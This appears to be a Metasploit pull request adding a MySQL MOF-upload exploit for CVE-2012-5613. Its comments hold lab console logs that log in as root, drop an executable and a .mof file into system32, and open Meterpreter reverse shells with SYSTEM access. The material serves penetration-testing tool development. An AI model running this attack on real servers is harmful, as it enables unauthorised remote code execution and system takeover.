
Add CVE-2012-5613: That MySQL 0day "Stuxnet" tekniq thingy #1132

Merged
merged 3 commits into from Dec 6, 2012

Conversation

@wchen-r7 (Contributor) commented Dec 6, 2012

This is one of kingcope's MySQL "0days". I decided to add it due to CVE coverage, and it adds another attack vector to a pentest. Who knows, maybe sometimes people need to test this.

Demo:

msf  exploit(mysql_mof) > check
[*] The target appears to be vulnerable.
msf  exploit(mysql_mof) > exploit

[*] Started reverse handler on 10.0.1.3:4444 
[*] 10.0.1.6:3306 - Attempting to login as 'root:goodpass'
[*] 10.0.1.6:3306 - Uploading to 'C:/windows/system32/iwMva.exe'
[*] 10.0.1.6:3306 - Uploading to 'C:/windows/system32/wbem/mof/FgQpn.mof'
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 5 opened (10.0.1.3:4444 -> 10.0.1.6:1596) at 2012-12-06 03:59:50 -0600

meterpreter >

@jvazquez-r7 (Contributor) commented:

Working fine:

msf  exploit(mysql_mof) > exploit
[*] Started reverse handler on 192.168.1.129:4444 
[*] 192.168.1.132:3306 - Attempting to login as 'root:root'
[*] 192.168.1.132:3306 - Uploading to 'C:/windows/system32/nWGAY.exe'
[*] 192.168.1.132:3306 - Uploading to 'C:/windows/system32/wbem/mof/sYzYO.mof'
[*] Sending stage (752128 bytes) to 192.168.1.132
[*] Meterpreter session 1 opened (192.168.1.129:4444 -> 192.168.1.132:1044) at 2012-12-06 11:32:47 +0100
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@jvazquez-r7 (Contributor) commented:

Added support for FileDropper, merging:

msf  exploit(mysql_mof) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.129:4444 
[*] 192.168.1.132:3306 - Attempting to login as 'root:root'
[*] 192.168.1.132:3306 - Uploading to 'C:/windows/system32/JNCQt.exe'
[*] 192.168.1.132:3306 - Uploading to 'C:/windows/system32/wbem/mof/QaEfD.mof'
[*] Sending stage (752128 bytes) to 192.168.1.132
[*] Meterpreter session 2 opened (192.168.1.129:4444 -> 192.168.1.132:1303) at 2012-12-06 12:01:12 +0100
[+] Deleted wbem\mof\good\QaEfD.mof
[!] This exploit may require manual cleanup of: JNCQt.exe
meterpreter > 

@jvazquez-r7 jvazquez-r7 merged commit 18f4df0 into rapid7:master Dec 6, 2012

3 participants